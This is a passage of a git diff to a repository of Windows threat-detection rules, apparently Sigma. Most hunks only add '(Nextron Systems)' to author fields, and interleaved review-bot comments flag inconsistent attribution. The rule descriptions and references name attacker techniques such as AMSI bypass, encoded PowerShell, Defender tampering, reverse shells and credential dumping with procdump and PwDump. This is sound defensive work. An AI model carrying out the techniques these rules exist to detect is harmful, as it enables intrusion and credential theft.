 - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
+author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
 date: 2018/04/06
 modified: 2022/07/14
 tags:
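Review bot: The new author value in the proc_creation_win_office_dir_traversal_cli.yml hunk, `'@SBousseaden (idea), Christian Burkard (Nextron Systems) (rule)'`, keeps the role suffix while the script_dropper, wannacry and msdt hunks in this same patch replace `(rule)` with `(Nextron Systems)` outright, so the commit leaves two different conventions for the same kind of attribution. Either drop the role here as well, `author: '@SBousseaden (idea), Christian Burkard (Nextron Systems)'`, or keep the `(idea)`/`(rule)` split in the other three files, but apply one convention across the patch so tooling that parses the author field sees a consistent shape. It also appears that none of the touched rules bump their `modified` date for this metadata-only edit; if the project's conventions treat any field change as a modification, that should be stated in the commit message or applied alongside.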
diff --git a/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml b/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml
index 0016a5e9e..e92550801 100644
--- a/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml
+++ b/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml
@@ -5,7 +5,7 @@ description: Detects svchost process spawning an instance of an office applicati
 references:
 - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic
 - https://github.com/med0x2e/vba2clr
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/13
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_outlook_shell.yml b/rules/windows/process_creation/proc_creation_win_outlook_shell.yml
index 7e9cd8111..fa99690b4 100644
--- a/rules/windows/process_creation/proc_creation_win_outlook_shell.yml
+++ b/rules/windows/process_creation/proc_creation_win_outlook_shell.yml
@@ -8,7 +8,7 @@ description: Detects a Windows command and scripting interpreter executable star
 references:
 - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100
 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
-author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
+author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team
 date: 2022/02/28
 modified: 2022/05/31
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml b/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
index 18b667aaa..0a06d08f0 100644
--- a/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
+++ b/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines
 references:
 - https://twitter.com/malmoeb/status/1550483085472432128
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/22
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml
index 6d2e148ef..dbed9f99d 100644
--- a/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml
@@ -5,7 +5,7 @@ description: Detects execution of perl using the "-e"/"-E" flags. This is could
 references:
 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
 - https://www.revshells.com/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/02
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml b/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml
index 18723cbf3..6f2bad40a 100644
--- a/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml
+++ b/rules/windows/process_creation/proc_creation_win_persistence_typed_paths.yml
@@ -5,7 +5,7 @@ description: Detects modification addition to the 'TypedPaths' key in the user o
 references:
 - https://twitter.com/dez_/status/1560101453150257154
 - https://forensafe.com/blogs/typedpaths.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/22
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml
index e36ff3b05..ae425450b 100644
--- a/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml
@@ -6,7 +6,7 @@ references:
 - https://www.php.net/manual/en/features.commandline.php
 - https://www.revshells.com/
 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/02
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml b/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml
index 447882dc8..2884d1fcc 100644
--- a/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml
+++ b/rules/windows/process_creation/proc_creation_win_plugx_susp_exe_locations.yml
@@ -5,7 +5,7 @@ description: Detects the execution of an executable that is typically used by Pl
 references:
 - http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/
 - https://countuponsecurity.com/2017/06/07/threat-hunting-in-the-enterprise-with-appcompatprocessor/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/06/12
 modified: 2022/01/28
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml b/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml
index 802fa0d09..ecd5a7dd9 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_add_windows_capability.yml
@@ -8,7 +8,7 @@ description: Detects usage of the "Add-WindowsCapability" cmdlet to add new wind
 references:
 - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell
 - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/22
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml b/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml
index 2a6d13d82..44820e5aa 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
 references:
 - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/04
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml
index fcf6ac816..288a7832a 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml
@@ -2,7 +2,7 @@ title: PowerShell Base64 Encoded FromBase64String Keyword
 id: fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c
 status: test
 description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/08/24
 modified: 2023/01/31
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
index b549ff4cd..4759efa5a 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
@@ -2,7 +2,7 @@ title: PowerShell Base64 Encoded IEX Keyword
 id: 88f680b8-070e-402c-ae11-d2914f2257f1
 status: test
 description: Detects usage of a base64 encoded "IEX" string in a process command line
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/08/23
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml
index 6f2597083..a3134bb1e 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml
@@ -7,7 +7,7 @@ status: test
 description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
 references:
 - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
-author: pH-T, Harjot Singh, '@cyb3rjy0t'
+author: pH-T (Nextron Systems), Harjot Singh, '@cyb3rjy0t'
 date: 2022/05/20
 modified: 2023/01/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml
index dd5d65973..d1bcb0500 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml
@@ -6,7 +6,7 @@ references:
 - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
 - https://twitter.com/AdamTheAnalyst/status/1483497517119590403
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/04
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml
index 6e97bfed4..d682bc63c 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_reflective_assembly_load.yml
@@ -8,7 +8,7 @@ description: Detects base64 encoded .NET reflective loading of Assembly
 references:
 - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
 - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
-author: Christian Burkard, pH-T
+author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems)
 date: 2022/03/01
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml
index e3479ff76..7778f93c4 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_shellcode.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects Base64 encoded Shellcode
 references:
 - https://twitter.com/cyb3rops/status/1063072865992523776
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/11/17
 modified: 2023/01/26
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml
index 57b68857e..a6ff57a54 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", ""...etc.
 references:
 - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
-author: Christian Burkard, Nasreddine Bencherchali
+author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali
 date: 2023/01/30
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
index f2dd43c5c..b589604b2 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
@@ -6,7 +6,7 @@ references:
 - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
 - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
 - https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/03/03
 modified: 2022/03/07
 tags:
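Review bot: The affiliation tag is applied inconsistently in the proc_creation_win_powershell_base64_wmi_classes.yml hunk: `+author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali` leaves the second author untagged while every other rule in this batch tags him, and the proc_creation_win_proc_dump_createdump.yml hunk has the same omission. If this is deliberate (the rule may predate the affiliation), a sentence in the commit description would stop a later "fix"; otherwise `+author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)` keeps the field consistent with the rest of the commit. Worth a second look in the same spirit: the proc_creation_win_powershell_susp_parameter_variation.yml and proc_creation_win_process_dump_rundll32_comsvcs.yml hunks replace the role annotations `(rule)` and `(update)` with the affiliation instead of keeping both, which silently drops attribution detail that the other contributors on the same line (`(idea)`, `(Fix)`) retain.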
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml
index 1825fc3a3..fffeef859 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml
@@ -9,7 +9,7 @@ references:
 - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
 - https://twitter.com/AdamTheAnalyst/status/1483497517119590403
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/04/29
 modified: 2022/05/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
index 0ead1ec09..fd6e4d62c 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml
@@ -5,7 +5,7 @@ related:
 type: derived
 status: test
 description: Detects a Powershell process that contains download commands in its command line string
-author: Florian Roth, oscd.community, Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
 date: 2019/01/16
 modified: 2023/01/26
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml b/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml
index d92854188..6c2453898 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_frombase64string.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
 references:
 - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/01/29
 modified: 2023/01/26
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml b/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml
index 0215088ab..4a53a3552 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml
@@ -8,7 +8,7 @@ description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
 references:
 - https://github.com/OTRF/detection-hackathon-apt29/issues/16
 - https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2020/05/02
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml b/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml
index ba194ffe0..ae53790f7 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml
@@ -4,7 +4,7 @@ status: experimental
 description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
 references:
 - https://www.mandiant.com/resources/evolution-of-fin7
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/04/06
 modified: 2022/07/14
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml b/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
index 33bdf05b1..04d05eed9 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_susp_download_patterns.yml
@@ -8,7 +8,7 @@ description: Detects suspicious PowerShell download patterns that are often used
 references:
 - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/28
 modified: 2022/03/01
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml b/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
index 1297d992b..4d3a29e68 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious PowerShell invocation with a parameter substring
 references:
 - http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier
-author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
+author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
 date: 2019/01/16
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_powertool_execution.yml b/rules/windows/process_creation/proc_creation_win_powertool_execution.yml
index 89f26df5e..f4a813301 100644
--- a/rules/windows/process_creation/proc_creation_win_powertool_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_powertool_execution.yml
@@ -7,7 +7,7 @@ references:
 - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html
 - https://twitter.com/gbti_sa/status/1249653895900602375?lang=en
 - https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/29
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
index 60f245540..c1177087c 100644
--- a/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
@@ -5,7 +5,7 @@ description: Detects uses of the createdump.exe LOLOBIN utility to dump process
 references:
 - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
 - https://twitter.com/bopin2020/status/1366400799199272960
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/01/04
 modified: 2022/08/19
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml
index b58372b9f..0f87dfe8c 100644
--- a/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml
+++ b/rules/windows/process_creation/proc_creation_win_proc_dump_dumpminitool.yml
@@ -5,7 +5,7 @@ description: Detects the use of a Visual Studio bundled tool named DumpMinitool.
 references:
 - https://twitter.com/mrd0x/status/1511415432888131586?s=20&t=DvVrzeZ1OcGiWowbhPV8Lg
 - https://twitter.com/mrd0x/status/1511489821247684615
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/06
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
index 3b1aef48f..f2f9b4066 100644
--- a/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
+++ b/rules/windows/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory
 references:
 - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/04
 modified: 2022/05/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml b/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml
index aa1739035..72c53b18e 100644
--- a/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml
+++ b/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml
@@ -5,7 +5,7 @@ description: Detects suspicious ways to use of a Visual Studio bundled tool name
 references:
 - https://twitter.com/mrd0x/status/1511415432888131586
 - https://twitter.com/mrd0x/status/1511489821247684615
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/06
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_procdump.yml b/rules/windows/process_creation/proc_creation_win_procdump.yml
index d5125b343..0e5b2d472 100644
--- a/rules/windows/process_creation/proc_creation_win_procdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_procdump.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of the SysInternals Procdump utility
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/16
 modified: 2022/08/11
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml b/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml
index e7f160290..acab7f0ee 100644
--- a/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml
+++ b/rules/windows/process_creation/proc_creation_win_procdump_evasion.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name
 references:
 - https://twitter.com/mrd0x/status/1480785527901204481
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
index 77bde466d..87164869a 100644
--- a/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
+++ b/rules/windows/process_creation/proc_creation_win_process_dump_rundll32_comsvcs.yml
@@ -12,7 +12,7 @@ references:
 - https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
 - https://twitter.com/SBousseaden/status/1167417096374050817
 - https://twitter.com/Wietze/status/1542107456507203586
-author: Florian Roth, Modexp, Nasreddine Bencherchali (update)
+author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
 date: 2020/02/18
 modified: 2022/09/21
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml b/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml
index 62346dc31..2419bbdc9 100644
--- a/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml
+++ b/rules/windows/process_creation/proc_creation_win_proxy_execution_wuauclt.yml
@@ -10,7 +10,7 @@ description: Detects the use of the Windows Update Client binary (wuauclt.exe) t
 references:
 - https://dtm.uk/wuauclt/
 - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
-author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth, Sreeman, FPT.EagleEye Team
+author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
 date: 2020/10/12
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml b/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml
index 8088025e5..6f1548074 100644
--- a/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml
+++ b/rules/windows/process_creation/proc_creation_win_psexesvc_start.yml
@@ -2,7 +2,7 @@ title: PsExec Service Start
 id: 3ede524d-21cc-472d-a3ce-d21b568d8db7
 status: test
 description: Detects a PsExec service start
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/03/13
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml b/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml
index 704d95dc3..ca121baf9 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
 references:
 - https://github.com/matterpreter/DefenderCheck
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/08/30
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml b/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml
index 26e6d5d15..6953bd684 100644
--- a/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml
+++ b/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml
@@ -5,7 +5,7 @@ description: Detects the execution of the PUA/Recon tool Seatbelt via PE informa
 references:
 - https://github.com/GhostPack/Seatbelt
 - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/18
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml b/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml
index a38b07fe4..32484460d 100644
--- a/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml
+++ b/rules/windows/process_creation/proc_creation_win_public_folder_parent.yml
@@ -4,7 +4,7 @@ status: experimental
 description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
 references:
 - https://redcanary.com/blog/blackbyte-ransomware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/25
 modified: 2022/11/18
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml b/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml
index dd1c950dd..4883e2eb6 100644
--- a/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml
+++ b/rules/windows/process_creation/proc_creation_win_purplesharp_indicators.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the execution of the PurpleSharp adversary simulation tool
 references:
 - https://github.com/mvelazc0/PurpleSharp
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/18
 modified: 2023/01/31
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml b/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml
index d3d21d645..9aeddd81f 100644
--- a/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml
@@ -6,7 +6,7 @@ references:
 - https://docs.python.org/3/using/cmdline.html#cmdoption-c
 - https://www.revshells.com/
 - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/02
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
index 1e30ba1c5..4accee8d4 100644
--- a/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
+++ b/rules/windows/process_creation/proc_creation_win_quarks_pwdump.yml
@@ -5,7 +5,7 @@ description: Detects usage of the Quarks PwDump tool via commandline arguments
 references:
